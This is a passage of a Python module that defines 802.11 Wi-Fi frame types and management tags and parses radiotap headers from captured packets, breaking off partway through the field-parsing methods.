#!/usr/bin/python """ Wi-Fi protocol definitions current supports for packets below Management -Probe Request -Probe Response -Beacon Control -RTS -CTS -Block Acknowledgement Data -QoS Data Also have Radiotap support http://www.radiotap.org/defined-fields """ import ctypes import struct import logging import operator import collections # wlan.fc.type _CATEGORIES_ = {0: 'management', 1: 'control', 2: 'data'} _SUBTYPES_ = {} # wlan.fc.type_subtype _SUBTYPES_[0] = { 0: 'Association Request', 1: 'Association Response', 2: 'Reassociation Request', 3: 'Reassociation Response', 4: 'Probe Request', 5: 'Probe Response', 8: 'Beacon', 9: 'ATIM', 10: 'Disassociation', 11: 'Authentication', 12: 'Deauthentication', 13: 'Action', 14: 'Action No ACK' } _SUBTYPES_[1] = { 5: 'VHT NDP Announcement', 7: 'Control Wrapper', 8: 'BAR', 9: 'BACK', 10: 'PS-POLL', 11: 'RTS', 12: 'CTS', 13: 'ACK', 14: 'CF-end', 15: 'CF-end + CF-ack' } _SUBTYPES_[2] = { 0: 'Data', 1: 'Data + CF-ack', 2: 'Data + CF-poll', 3: 'Data+CF-ack+CF-poll', 4: 'Null', 5: 'CF-ack', 6: 'CF-poll', 7: 'CF-ack+CF-poll', 8: 'QoS data', 9: 'QoS data + CF-ack', 10: 'QoS data + CF-poll', 11: 'QoS data + CF-ack + CF-poll', 12: 'QoS Null', 13: 'Reserved', 14: 'Qos + CF-poll(no data)', 15: 'Qos + CF-ack(no data)' } # wlan_mgt.tag MNGMT_TAGS = { 0: "TAG_SSID", 1: "TAG_SUPP_RATES", 2: "TAG_FH_PARAMETER", 3: "TAG_DS_PARAMETER", 4: "TAG_CF_PARAMETER", 5: "TAG_TIM", 6: "TAG_IBSS_PARAMETER", 7: "TAG_COUNTRY_INFO", 8: "TAG_FH_HOPPING_PARAMETER", 9: "TAG_FH_HOPPING_TABLE", 10: "TAG_REQUEST", 11: "TAG_QBSS_LOAD", 12: "TAG_EDCA_PARAM_SET", 13: "TAG_TSPEC", 14: "TAG_TCLAS", 15: "TAG_SCHEDULE", 16: "TAG_CHALLENGE_TEXT", 32: "TAG_POWER_CONSTRAINT", 33: "TAG_POWER_CAPABILITY", 34: "TAG_TPC_REQUEST", 35: "TAG_TPC_REPORT", 36: "TAG_SUPPORTED_CHANNELS", 37: "TAG_CHANNEL_SWITCH_ANN", 38: "TAG_MEASURE_REQ", 39: "TAG_MEASURE_REP", 40: "TAG_QUIET", 41: "TAG_IBSS_DFS", 42: "TAG_ERP_INFO", 43: "TAG_TS_DELAY", 44: "TAG_TCLAS_PROCESS", 45: "TAG_HT_CAPABILITY", 46: "TAG_QOS_CAPABILITY", 47: "TAG_ERP_INFO_OLD", 48: "TAG_RSN_IE", 50: "TAG_EXT_SUPP_RATES", 51: "TAG_AP_CHANNEL_REPORT", 52: "TAG_NEIGHBOR_REPORT", 53: "TAG_RCPI", 54: "TAG_MOBILITY_DOMAIN", 55: "TAG_FAST_BSS_TRANSITION", 56: "TAG_TIMEOUT_INTERVAL", 57: "TAG_RIC_DATA", 58: "TAG_DSE_REG_LOCATION", 59: "TAG_SUPPORTED_OPERATING_CLASSES", 60: "TAG_EXTENDED_CHANNEL_SWITCH_ANNOUNCEMENT", 61: "TAG_HT_INFO", 62: "TAG_SECONDARY_CHANNEL_OFFSET", 63: "TAG_BSS_AVG_ACCESS_DELAY", 64: "TAG_ANTENNA", 65: "TAG_RSNI", 66: "TAG_MEASURE_PILOT_TRANS", 67: "TAG_BSS_AVB_ADM_CAPACITY", 68: "TAG_BSS_AC_ACCESS_DELAY", 69: "TAG_TIME_ADV", 70: "TAG_RM_ENABLED_CAPABILITY", 71: "TAG_MULTIPLE_BSSID", 72: "TAG_20_40_BSS_CO_EX", 73: "TAG_20_40_BSS_INTOL_CH_REP", 74: "TAG_OVERLAP_BSS_SCAN_PAR", 75: "TAG_RIC_DESCRIPTOR", 76: "TAG_MMIE", 78: "TAG_EVENT_REQUEST", 79: "TAG_EVENT_REPORT", 80: "TAG_DIAGNOSTIC_REQUEST", 81: "TAG_DIAGNOSTIC_REPORT", 82: "TAG_LOCATION_PARAMETERS", 83: "TAG_NO_BSSID_CAPABILITY", 84: "TAG_SSID_LIST", 85: "TAG_MULTIPLE_BSSID_INDEX", 86: "TAG_FMS_DESCRIPTOR", 87: "TAG_FMS_REQUEST", 88: "TAG_FMS_RESPONSE", 89: "TAG_QOS_TRAFFIC_CAPABILITY", 90: "TAG_BSS_MAX_IDLE_PERIOD", 91: "TAG_TFS_REQUEST", 92: "TAG_TFS_RESPONSE", 93: "TAG_WNM_SLEEP_MODE", 94: "TAG_TIM_BROADCAST_REQUEST", 95: "TAG_TIM_BROADCAST_RESPONSE", 96: "TAG_COLLOCATED_INTER_REPORT", 97: "TAG_CHANNEL_USAGE", 98: "TAG_TIME_ZONE", 99: "TAG_DMS_REQUEST", 100: "TAG_DMS_RESPONSE", 101: "TAG_LINK_IDENTIFIER", 102: "TAG_WAKEUP_SCHEDULE", 104: "TAG_CHANNEL_SWITCH_TIMING", 105: "TAG_PTI_CONTROL", 106: "TAG_PU_BUFFER_STATUS", 107: "TAG_INTERWORKING", 108: "TAG_ADVERTISEMENT_PROTOCOL", 109: "TAG_EXPIDITED_BANDWIDTH_REQ", 110: "TAG_QOS_MAP_SET", 111: "TAG_ROAMING_CONSORTIUM", 112: "TAG_EMERGENCY_ALERT_ID", 113: "TAG_MESH_CONFIGURATION", 114: "TAG_MESH_ID", 115: "TAG_MESH_LINK_METRIC_REPORT", 116: "TAG_CONGESTION_NOTIFICATION", 117: "TAG_MESH_PEERING_MGMT", 118: "TAG_MESH_CHANNEL_SWITCH", 119: "TAG_MESH_AWAKE_WINDOW", 120: "TAG_BEACON_TIMING", 121: "TAG_MCCAOP_SETUP_REQUEST", 122: "TAG_MCCAOP_SETUP_REPLY", 123: "TAG_MCCAOP_ADVERTISEMENT", 124: "TAG_MCCAOP_TEARDOWN", 125: "TAG_GANN", 126: "TAG_RANN", 127: "TAG_EXTENDED_CAPABILITIES", 128: "TAG_AGERE_PROPRIETARY", 130: "TAG_MESH_PREQ", 131: "TAG_MESH_PREP", 132: "TAG_MESH_PERR", 133: "TAG_CISCO_CCX1_CKIP", 136: "TAG_CISCO_CCX2", 137: "TAG_PXU", 138: "TAG_PXUC", 139: "TAG_AUTH_MESH_PEERING_EXCH", 140: "TAG_MIC", 141: "TAG_DESTINATION_URI", 142: "TAG_U_APSD_COEX", 143: "TAG_WAKEUP_SCHEDULE_AD", 144: "TAG_EXTENDED_SCHEDULE", 145: "TAG_STA_AVAILABILITY", 146: "TAG_DMG_TSPEC", 147: "TAG_NEXT_DMG_ATI", 148: "TAG_DMG_CAPABILITIES", 149: "TAG_CISCO_CCX3", 150: "TAG_CISCO_VENDOR_SPECIFIC", 151: "TAG_DMG_OPERATION", 152: "TAG_DMG_BSS_PRAMTER_CHANGE", 153: "TAG_DMG_BEAM_REFINEMENT", 154: "TAG_CHANNEL_MEASURMENT_FB", 157: "TAG_AWAKE_WINDOW", 158: "TAG_MULTI_BAND", 159: "TAG_ADDBA_EXT", 160: "TAG_NEXTPCP_LIST", 161: "TAG_PCP_HANDOVER", 162: "TAG_DMG_LINK_MARGIN", 163: "TAG_SWITCHING_STREAM", 164: "TAG_SESSION_TRANSMISSION", 165: "TAG_DYN_TONE_PAIR_REP", 166: "TAG_CLUSTER_REP", 167: "TAG_RELAY_CAPABILITIES", 168: "TAG_RELAY_TRANSFER_PARAM", 169: "TAG_BEAMLINK_MAINTAINCE", 170: "TAG_MULTIPLE_MAC_SUBLAYERS", 171: "TAG_U_PID", 172: "TAG_DMG_LINK_ADAPTION_ACK", 173: "TAG_SYMBOL_PROPRIETARY", 174: "TAG_MCCAOP_ADVERTISEMENT_OV", 175: "TAG_QUIET_PERIOD_REQ", 177: "TAG_QUIET_PERIOD_RES", 182: "TAG_ECPAC_POLICY", 183: "TAG_CLUSTER_TIME_OFFSET", 190: "TAG_ANTENNA_SECTOR_ID", 191: "TAG_VHT_CAPABILITY", 192: "TAG_VHT_OPERATION", 193: "TAG_EXT_BSS_LOAD", 194: "TAG_WIDE_BW_CHANNEL_SWITCH", 195: "TAG_VHT_TX_PWR_ENVELOPE", 196: "TAG_CHANNEL_SWITCH_WRAPPER", 199: "TAG_OPERATING_MODE_NOTIFICATION", 221: "TAG_VENDOR_SPECIFIC_IE" } def WIFI(frame, no_rtap=False): """calls wifi packet discriminator and constructor. :frame: ctypes.Structure :no_rtap: Bool :return: packet object in success :return: int -1 on known error :return: int -2 on unknown error """ pack = None try: pack = WiHelper.get_wifi_packet(frame, no_rtap) except Exception as e: logging.exception(e) return pack class WiHelper: """Wi-Fi packet discriminator class. Identifies type and subtype of packet, then trigs packet object creation. """ @staticmethod def get_wifi_packet(frame, no_rtap=False): """Discriminates Wi-Fi packet and creates packet object. :frame: ctypes.Structure :no_rtap: Bool :return: obj Wi-Fi packet """ _, packet = WiHelper._strip_rtap(frame) frame_control = struct.unpack('BB', packet[:2]) cat = (frame_control[0] >> 2) & 0b0011 s_type = frame_control[0] >> 4 if cat not in _CATEGORIES_.keys(): logging.warning("unknown category: %d" % (cat)) return Unknown(frame, no_rtap) if s_type not in _SUBTYPES_[cat].keys(): logging.warning("unknown subtype %d in %s category" % (s_type, _CATEGORIES_[cat])) return Unknown(frame, no_rtap) if cat == 0: if s_type == 4: return ProbeReq(frame, no_rtap) elif s_type == 5: return ProbeResp(frame, no_rtap) elif s_type == 8: return Beacon(frame, no_rtap) else: return Management(frame, no_rtap) elif cat == 1: if s_type == 11: return RTS(frame, no_rtap) elif s_type == 12: return CTS(frame, no_rtap) elif s_type == 9: return BACK(frame, no_rtap) else: return Control(frame, no_rtap) elif cat == 2: if s_type == 8: return QosData(frame, no_rtap, parse_amsdu=True) else: return Data(frame, no_rtap) @staticmethod def _strip_rtap(frame): """strip injected radiotap header. :return: ctypes.Structure radiotap header :return: ctypes.Structure actual layer 2 Wi-Fi payload """ rtap_len = WiHelper.__get_rtap_len(frame) rtap = frame[:rtap_len] packet = frame[rtap_len:] return rtap, packet @staticmethod def __get_rtap_len(frame): """parse length of radiotap header. :packet: ctypes.structure :return: int """ r_len = struct.unpack('H', frame[2:4]) return r_len[0] class Radiotap(ctypes.Structure): """Radiotap Header Parser Class. Radiotap headers summarize physical layer parameters of Wi-Fi packet, such as MCS(modulation and coding scheme), NSS(number of spatial streams), BW(bandwidth) for all common protocol types(802.11a, 802.11n, 802.11ac etc.) see -> http://www.radiotap.org/defined-fields see -> https://github.com/boundary/wireshark/blob/master/epan/dissectors/packet-ieee80211-radiotap-defs.h """ _rfields_ = [('vers', ctypes.c_uint8), ('pad', ctypes.c_uint8), ('len', ctypes.c_uint16), ('present.tsft', ctypes.c_bool), ('present.flags', ctypes.c_bool), ('present.rate', ctypes.c_bool), ('present.channel', ctypes.c_bool), ('present.fhss', ctypes.c_bool), ('present.dbm_antsignal', ctypes.c_bool), ('present.dbm_antnoise', ctypes.c_bool), ('present.lock_quality', ctypes.c_bool), ('present.tx_attenuation', ctypes.c_bool), ('present.db_tx_attenuation', ctypes.c_bool), ('present.dbm_tx_power', ctypes.c_bool), ('present.antenna', ctypes.c_bool), ('present.db_antsignal', ctypes.c_bool), ('present.db_antnoise', ctypes.c_bool), ('present.rxflags', ctypes.c_bool), ('present.txflags', ctypes.c_bool), ('present.rts_retries', ctypes.c_bool), ('present.data_retries', ctypes.c_bool), ('present.xchannel', ctypes.c_bool), ('present.mcs', ctypes.c_bool), ('present.ampdu', ctypes.c_bool), ('present.vht', ctypes.c_bool), ('present.rtap_ns', ctypes.c_bool), ('present.ven_ns', ctypes.c_bool), ('present.ext', ctypes.c_bool), ('mactime', ctypes.c_uint64), ('flags.cfp', ctypes.c_bool), ('flags.preamble', ctypes.c_bool), ('flags.wep', ctypes.c_bool), ('flags.fragmentation', ctypes.c_bool), ('flags.fcs', ctypes.c_bool), ('flags.datapad', ctypes.c_bool), ('flags.badfcs', ctypes.c_bool), ('flags.shortgi', ctypes.c_bool), ('rate', ctypes.c_uint), ('chan.freq', ctypes.c_uint), ('chan.turbo', ctypes.c_bool), ('chan.cck', ctypes.c_bool), ('chan.ofdm', ctypes.c_bool), ('chan.two_g', ctypes.c_bool), ('chan.five_g', ctypes.c_bool), ('chan.passive', ctypes.c_bool), ('chan.dynamic', ctypes.c_bool), ('chan.gfsk', ctypes.c_bool), ('chan.gsm', ctypes.c_bool), ('chan.static_turbo', ctypes.c_bool), ('chan.half_rate', ctypes.c_bool), ('chan.quarter_rate', ctypes.c_bool), ('fhss.hopset', ctypes.c_int), ('fhss.pattern', ctypes.c_uint), ('dbm_antsignal', ctypes.c_uint), ('dbm_antnoise', ctypes.c_uint), ('lock_quality', ctypes.c_uint), ('tx_attenuation', ctypes.c_uint), ('db_tx_attenuation', ctypes.c_uint), ('dbm_tx_power', ctypes.c_uint), ('antenna', ctypes.c_uint), ('db_antsignal', ctypes.c_uint), ('db_antnoise', ctypes.c_uint), ('rxflags.reserved', ctypes.c_bool), ('rxflags.badplcp', ctypes.c_bool), ('txflags', ctypes.c_uint), ('rts_retries', ctypes.c_uint), ('data_retries', ctypes.c_uint), ('xchannel.freq', ctypes.c_uint), ('xchannel.channel', ctypes.c_uint), ('xchannel.max_power', ctypes.c_uint), ('xchannel.flags.turbo', ctypes.c_bool), ('xchannel.flags.cck', ctypes.c_bool), ('xchannel.flags.ofdm', ctypes.c_bool), ('xchannel.flags.two_g', ctypes.c_bool), ('xchannel.flags.five_g', ctypes.c_bool), ('xchannel.flags.passive', ctypes.c_bool), ('xchannel.flags.dynamic', ctypes.c_bool), ('xchannel.flags.gfsk', ctypes.c_bool), ('xchannel.flags.gsm', ctypes.c_bool), ('xchannel.flags.sturbo', ctypes.c_bool), ('xchannel.flags.half', ctypes.c_bool), ('xchannel.flags.quarter', ctypes.c_bool), ('xchannel.flags.ht_20', ctypes.c_bool), ('xchannel.flags.ht_40u', ctypes.c_bool), ('xchannel.flags.ht_40d', ctypes.c_bool), ('mcs.known', ctypes.c_uint8), ('mcs.index', ctypes.c_uint8), ('mcs.have_bw', ctypes.c_bool), ('mcs.have_mcs', ctypes.c_bool), ('mcs.have_gi', ctypes.c_bool), ('mcs.have_format', ctypes.c_bool), ('mcs.have_fec', ctypes.c_bool), ('mcs.have_stbc', ctypes.c_bool), ('mcs.have_ness', ctypes.c_bool), ('mcs.ness_bit1', ctypes.c_bool), ('ampdu.refnum', ctypes.c_uint), ('ampdu.crc_val', ctypes.c_uint8), ('ampdu.reserved', ctypes.c_uint8), ('ampdu.flags.report_zerolen', ctypes.c_bool), ('ampdu.flags.is_zerolen', ctypes.c_bool), ('ampdu.flags.lastknown', ctypes.c_bool), ('ampdu.flags.last', ctypes.c_bool), ('ampdu.flags.delim_crc_error', ctypes.c_bool), ('vht.known_bits', ctypes.c_char_p), ('vht.have_stbc', ctypes.c_bool), ('vht.have_txop_ps', ctypes.c_bool), ('vht.have_gi', ctypes.c_bool), ('vht.have_sgi_nsym_da', ctypes.c_bool), ('vht.have_ldpc_extra', ctypes.c_bool), ('vht.have_beamformed', ctypes.c_bool), ('vht.have_bw', ctypes.c_bool), ('vht.have_gid', ctypes.c_bool), ('vht.have_paid', ctypes.c_bool), ('vht.flag_bits', ctypes.c_bool), ('vht.stbc', ctypes.c_bool), ('vht.txop_ps', ctypes.c_bool), ('vht.gi', ctypes.c_bool), ('vht.sgi_nysm_da', ctypes.c_bool), ('vht.ldpc_extra', ctypes.c_bool), ('vht.beamformed', ctypes.c_bool), ('vht.group_id', ctypes.c_bool), ('vht.partial_id', ctypes.c_bool), ('vht.bw', ctypes.c_uint), ('vht.user_0.nss', ctypes.c_bool), ('vht.user_0.mcs', ctypes.c_bool), ('vht.user_0.coding', ctypes.c_bool), ('vht.user_1.nss', ctypes.c_bool), ('vht.user_1.mcs', ctypes.c_bool), ('vht.user_1.coding', ctypes.c_bool), ('vht.user_2.nss', ctypes.c_bool), ('vht.user_2.mcs', ctypes.c_bool), ('vht.user_2.coding', ctypes.c_bool), ('vht.user_3.nss', ctypes.c_bool), ('vht.user_3.mcs', ctypes.c_bool), ('vht.user_3.coding', ctypes.c_bool), ('prot_type', ctypes.c_char_p)] # Wireshark syntax conjugates of fields in object _r_shark_ = {'radiotap.version': 'vers', 'radiotap.pad': 'pad', 'radiotap.length': 'len', 'radiotap.present.tsft': 'present.tsft', 'radiotap.present.flags': 'present.flags', 'radiotap.present.rate': 'present.rate', 'radiotap.present.channel': 'present.channel', 'radiotap.present.fhss': 'present.fhss', 'radiotap.present.dbm_antsignal': 'present.dbm_antsignal', 'radiotap.present.dbm_antnoise': 'present.dbm_antnoise', 'radiotap.present.lock_quality': 'present.lock_quality', 'radiotap.present.tx_attenuation': 'present.tx_attenuation', 'radiotap.present.db_tx_attenuation': 'present.db_tx_attenuation', 'radiotap.present.dbm_tx_power': 'present.dbm_tx_power', 'radiotap.present.antenna': 'present.antenna', 'radiotap.present.db_antsignal': 'present.db_antsignal', 'radiotap.present.db_antnoise': 'present.db_antnoise', 'radiotap.present.rxflags': 'present.rxflags', 'radiotap.present.xchannel': 'present.xchannel', 'radiotap.present.mcs': 'present.mcs', 'radiotap.present.ampdu': 'present.ampdu', 'radiotap.present.vht': 'present.vht', 'radiotap.present.rtap_ns': 'present.rtap_ns', 'radiotap.present.vendor_ns': 'present.ven_ns', 'radiotap.present.ext': 'present.ext', 'radiotap.mactime': 'mactime', 'radiotap.flags.cfp': 'flags.cfp', 'radiotap.flags.preamble': 'flags.preamble', 'radiotap.flags.wep': 'flags.wep', 'radiotap.flags.frag': 'flags.fragmentation', 'radiotap.flags.fcs': 'flags.fcs', 'radiotap.flags.datapad': 'flags.datapad', 'radiotap.flags.badfcs': 'flags.badfcs', 'radiotap.flags.shortgi': 'flags.shortgi', 'radiotap.datarate': 'rate', 'radiotap.channel.freq': 'chan.freq', 'radiotap.channel.flags.turbo': 'chan.turbo', 'radiotap.channel.flags.cck': 'chan.cck', 'radiotap.channel.flags.ofdm': 'chan.ofdm', 'radiotap.channel.flags.2ghz': 'chan.two_g', 'radiotap.channel.flags.5ghz': 'chan.five_g', 'radiotap.channel.flags.passive': 'chan.passive', 'radiotap.channel.flags.dynamic': 'chan.dynamic', 'radiotap.channel.flags.gfsk': 'chan.gfsk', 'radiotap.channel.flags.gsm': 'chan.gsm', 'radiotap.channel.flags.sturbo': 'chan.static_turbo', 'radiotap.channel.flags.half': 'chan.half_rate', 'radiotap.channel.flags.quarter': 'chan.quarter_rate', 'radiotap.fhss.hopset': 'fhss.hopset', 'radiotap.fhss.pattern': 'fhss.pattern', 'radiotap.dbm_antsignal': 'dbm_antsignal', 'radiotap.dbm_antnoise': 'dbm_antnoise', 'radiotap.antenna': 'antenna', 'radiotap.db_antsignal': 'db_antsignal', 'radiotap.db_antnoise': 'db_antnoise', 'radiotap.rxflags.badplcp': 'rxflags.badplcp', 'radiotap.xchannel.freq': 'xchannel.freq', 'radiotap.xchannel.channel': 'xchannel.channel', 'radiotap.xchannel.flags.turbo': 'xchannel.flags.turbo', 'radiotap.xchannel.flags.cck': 'xchannel.flags.cck', 'radiotap.xchannel.flags.ofdm': 'xchannel.flags.ofdm', 'radiotap.xchannel.flags.2ghz': 'xchannel.flags.two_g', 'radiotap.xchannel.flags.5ghz': 'xchannel.flags.five_g', 'radiotap.xchannel.flags.passive': 'xchannel.flags.passive', 'radiotap.xchannel.flags.dynamic': 'xchannel.flags.dynamic', 'radiotap.xchannel.flags.gfsk': 'xchannel.flags.gfsk', 'radiotap.xchannel.flags.gsm': 'xchannel.flags.gsm', 'radiotap.xchannel.flags.sturbo': 'xchannel.flags.sturbo', 'radiotap.xchannel.flags.half': 'xchannel.flags.half', 'radiotap.xchannel.flags.quarter': 'xchannel.flags.quarter', 'radiotap.xchannel.flags.ht20': 'xchannel.flags.ht_20', 'radiotap.xchannel.flags.ht40u': 'xchannel.flags.ht_40u', 'radiotap.xchannel.flags.ht40d': 'xchannel.flags.ht_40d', 'radiotap.mcs.known': 'mcs.known', 'radiotap.mcs.index': 'mcs.index', 'radiotap.mcs.have_bw': 'mcs.have_bw', 'radiotap.mcs.have_gi': 'mcs.have_gi', 'radiotap.mcs.have_format': 'mcs.have_format', 'radiotap.mcs.have_fec': 'mcs.have_fec', 'radiotap.mcs.have_stbc': 'mcs.have_stbc', 'radiotap.mcs.have_ness': 'mcs.have_ness', 'radiotap.mcs.ness_bit1': 'mcs.ness_bit1', 'radiotap.ampdu.reference': 'ampdu.refnum', 'radiotap.ampdu.crc_val': 'ampdu.crc_val', 'radiotap.ampdu.reserved': 'ampdu.reserved', 'radiotap.ampdu.flags.report_zerolen': 'ampdu.flags.report_zerolen', 'radiotap.ampdu.flags.is_zerolen': 'ampdu.flags.is_zerolen', 'radiotap.ampdu.flags.lastknown': 'ampdu.flags.lastknown', 'radiotap.ampdu.flags.last': 'ampdu.flags.last', 'radiotap.ampdu.flags.delim_crc_error': 'ampdu.flags.delim_crc_error', 'radiotap.vht.have_stbc': 'vht.have_stbc', 'radiotap.vht.have_txop_ps': 'vht.have_txop_ps', 'radiotap.vht.have_gi': 'vht.have_gi', 'radiotap.vht.have_sgi_nsym_da': 'vht.have_sgi_nsym_da', 'radiotap.vht.have_ldpc_extra': 'vht.have_ldpc_extra', # this does not seem with have_ prefix in wireshark 'radiotap.vht.have_beamformed': 'vht.have_beamformed', # creates conflict with ldpc_extra below; we keep radiotap 'radiotap.vht.have_bw': 'vht.have_bw', # syntax. 'radiotap.vht.have_gid': 'vht.have_gid', 'radiotap.vht.have_paid': 'vht.have_paid', 'radiotap.vht.stbc': 'vht.stbc', 'radiotap.vht.txop_ps': 'vht.txop_ps', 'radiotap.vht.gi': 'vht.gi', 'radiotap.vht.sgi_nysm_da': 'vht.sgi_nysm_da', 'radiotap.vht.ldpc_extra': 'vht.ldpc_extra', 'radiotap.vht.beamformed': 'vht.beamformed', 'radiotap.vht.gid': 'vht.group_id', 'radiotap.vht.paid': 'vht.partial_id', 'radiotap.vht.bw': 'vht.bw', 'radiotap.vht.nss.0': 'vht.user_0.nss', 'radiotap.vht.mcs.0': 'vht.user_0.mcs', 'radiotap.vht.coding.0': 'vht.user_0.coding', 'radiotap.vht.nss.1': 'vht.user_1.nss', 'radiotap.vht.mcs.1': 'vht.user_1.mcs', 'radiotap.vht.coding.1': 'vht.user_1.coding', 'radiotap.vht.nss.2': 'vht.user_2.nss', 'radiotap.vht.mcs.2': 'vht.user_2.mcs', 'radiotap.vht.coding.2': 'vht.user_2.coding', 'radiotap.vht.nss.3': 'vht.user_3.nss', 'radiotap.vht.mcs.3': 'vht.user_3.mcs', 'radiotap.vht.coding.3': 'vht.user_3.coding'} def __init__(self, rtap_bytes): """Constructor method. :rtap_bytes: ctypes.Structure """ super(Radiotap, self).__init__() self._raw = {} # contains raw bytes, for debugging purposes self._bits = {} # contains bitstrings, for debugging purposes idx = 0 self._rtap = rtap_bytes # parse radiotap headers self.vers = Radiotap.strip_vers(self._rtap[idx:idx + 1]) idx += 1 self.pad = Radiotap.strip_pad(self._rtap[idx:idx + 1]) idx += 1 self.len = Radiotap.strip_len(self._rtap[idx:idx + 2]) idx += 2 self.present, self.present_bits = Radiotap.strip_present(self._rtap[idx:idx + 4]) idx += 4 # parse radiotap payload if self.present.tsft: # 8 byte idx, self.mactime = self.strip_tsft(idx) if self.present.flags: # 1 byte idx, self.flags = self.strip_flags(idx) if self.present.rate: # 1 byte idx, self.rate = self.strip_rate(idx) if self.present.channel: # 2 byte (align 2 byte) idx, self.chan = self.strip_chan(idx) if self.present.fhss: # 2 byte idx, self.fhss = self.strip_fhss(idx) if self.present.dbm_antsignal: # 1 byte idx, self.dbm_antsignal = self.strip_dbm_antsignal(idx) if self.present.dbm_antnoise: # 1 byte idx, self.dbm_antnoise = self.strip_dbm_antnoise(idx) if self.present.lock_quality: # 2 byte (align 2 byte) idx, self.lock_quality = self.strip_lock_quality(idx) if self.present.tx_attenuation: # 1 byte (align 2 byte) idx, self.tx_attenuation = self.strip_tx_attenuation(idx) if self.present.db_tx_attenuation: # 1 byte (align 2 byte) idx, self.db_tx_attenuation = self.strip_db_tx_attenuation(idx) if self.present.dbm_tx_power: # 1 byte (align 1 byte) idx, self.dbm_tx_power = self.strip_dbm_tx_power(idx) if self.present.antenna: # 1 byte idx, self.antenna = self.strip_antenna(idx) if self.present.db_antsignal: # 1 byte idx, self.db_antsignal = self.strip_db_antsignal(idx) if self.present.db_antnoise: # 1 byte idx, self.db_antnoise = self.strip_db_antnoise(idx) if self.present.rxflags: # 2 byte (align 2 byte) idx, self.rxflags = self.strip_rx_flags(idx) if self.present.txflags: # 1 byte (align 2 byte) idx, self.txflags = self.strip_tx_flags(idx) if self.present.rts_retries: # 1 byte idx, self.rts_retries = self.strip_rts_retries(idx) if self.present.data_retries: # 1 byte idx, self.data_retries = self.strip_data_retries(idx) if self.present.xchannel: # 7 byte (align 2 byte) idx, self.xchannel = self.strip_xchannel(idx) if self.present.mcs: # 3 byte (align 1 byte) idx, self.mcs = self.strip_mcs(idx) if self.present.ampdu: # 8 byte (align 4 byte) idx, self.ampdu = self.strip_ampdu(idx) if self.present.vht: # 12 byte (align 2 byte) idx, self.vht = self.strip_vht(idx) self.prot_type = self.extract_protocol() @staticmethod def strip_vers(payload): """strip(1 byte) radiotap.version :payload: ctypes.Structure :return: int """ return struct.unpack('B', payload)[0] @staticmethod def strip_pad(payload): """strip(1 byte) radiotap.pad :payload: ctypes.Structure :return: int """ return struct.unpack('B', payload)[0] @staticmethod def strip_len(payload): """strip(2 byte) radiotap.length :payload: ctypes.Structure :return: int """ return struct.unpack('H', payload)[0] @staticmethod def strip_present(payload): """strip(4 byte) radiotap.present. Those are flags that identify existence of incoming radiotap meta-data. :idx: int :return: str :return: namedtuple """ present = collections.namedtuple( 'present', ['tsft', 'flags', 'rate', 'channel', 'fhss', 'dbm_antsignal', 'dbm_antnoise', 'lock_quality', 'tx_attenuation', 'db_tx_attenuation', 'dbm_tx_power', 'antenna', 'db_antsignal', 'db_antnoise', 'rxflags', 'txflags', 'rts_retries', 'data_retries', 'xchannel', 'mcs', 'ampdu', 'vht', 'rtap_ns', 'ven_ns', 'ext']) val = struct.unpack('<L', payload)[0] bits = format(val, '032b')[::-1] present.tsft = int(bits[0]) # timer synchronization function present.flags = int(bits[1]) # flags present.rate = int(bits[2]) # rate present.channel = int(bits[3]) # channel present.fhss = int(bits[4]) # frequency hoping spread spectrum present.dbm_antsignal = int(bits[5]) # dbm antenna signal present.dbm_antnoise = int(bits[6]) # dbm antenna noinse present.lock_quality = int(bits[7]) # quality of barker code lock present.tx_attenuation = int(bits[8]) # transmitter attenuation present.db_tx_attenuation = int(bits[9]) # decibel transmit attenuation present.dbm_tx_power = int(bits[10]) # dbm transmit power present.antenna = int(bits[11]) # antenna present.db_antsignal = int(bits[12]) # db antenna signal present.db_antnoise = int(bits[13]) # db antenna noise present.rxflags = int(bits[14]) # receiver flags present.txflags = int(bits[15]) # transmitter flags present.rts_retries = int(bits[16]) # rts(request to send) retries present.data_retries = int(bits[17]) # data retries present.xchannel = int(bits[18]) # xchannel present.mcs = int(bits[19]) # modulation and coding scheme present.ampdu = int(bits[20]) # aggregated mac protocol data unit present.vht = int(bits[21]) # very high throughput present.rtap_ns = int(bits[29]) # radiotap namespace present.ven_ns = int(bits[30]) # vendor namespace present.ext = int(bits[31]) # extension return present, bits def strip_tsft(self, idx): """strip(8 byte) radiotap.mactime :idx: int :return: int idx :return: int mactime """ idx = Radiotap.align(idx, 8) mactime, = struct.unpack_from('<Q', self._rtap, idx) return idx + 8, mactime def strip_flags(self, idx): """strip(1 byte) radiotap.flags :idx: int :return: int idx :return: collections.namedtuple """ flags = collections.namedtuple( 'flags', ['cfp', 'preamble', 'wep', 'fragmentation', 'fcs', 'datapad', 'badfcs', 'shortgi']) val, = struct.unpack_from('<B', self._rtap, idx) bits = format(val, '08b')[::-1] flags.cfp = int(bits[0]) flags.preamble = int(bits[1]) flags.wep = int(bits[2]) flags.fragmentation = int(bits[3]) flags.fcs = int(bits[4]) flags.datapad = int(bits[5]) flags.badfcs = int(bits[6]) flags.shortgi = int(bits[7]) return idx + 1, flags def strip_rate(self, idx): """strip(1 byte) radiotap.datarate note that, unit of this field is originally 0.5 Mbps :idx: int :return: int idx :return: double rate in terms of Mbps """ val, = struct.unpack_from('<B', self._rtap, idx) rate_unit = float(1) / 2 # Mbps return idx + 1, rate_unit * val def strip_chan(self, idx): """strip(2 byte) radiotap.channel.flags :idx: int :return: int idx :return: collections.namedtuple """ chan = collections.namedtuple( 'chan', ['freq', 'turbo', 'cck', 'ofdm', 'two_g', 'five_g', 'passive', 'dynamic', 'gfsk', 'gsm', 'static_turbo', 'half_rate', 'quarter_rate']) idx = Radiotap.align(idx, 2) freq, flags, = struct.unpack_from('<HH', self._rtap, idx) chan.freq = freq bits = format(flags, '016b')[::-1] chan.turbo = int(bits[4]) chan.cck = int(bits[5]) chan.ofdm = int(bits[6]) chan.two_g = int(bits[7]) chan.five_g = int(bits[8]) chan.passive = int(bits[9]) chan.dynamic = int(bits[10]) chan.gfsk = int(bits[11]) chan.gsm = int(bits[12]) chan.static_turbo = int(bits[13]) chan.half_rate = int(bits[14]) chan.quarter_rate = int(bits[15]) return idx + 4, chan def strip_fhss(self, idx): """strip (2 byte) radiotap.fhss.hopset(1 byte) and radiotap.fhss.pattern(1 byte) :idx: int :return: int idx :return: collections.namedtuple """ fhss = collections.namedtuple('fhss', ['hopset', 'pattern']) fhss.hopset, fhss.pattern, = struct.unpack_from('<bb', self._rtap, idx) return idx + 2, fhss def strip_dbm_antsignal(self, idx): """strip(1 byte) radiotap.dbm.ant_signal 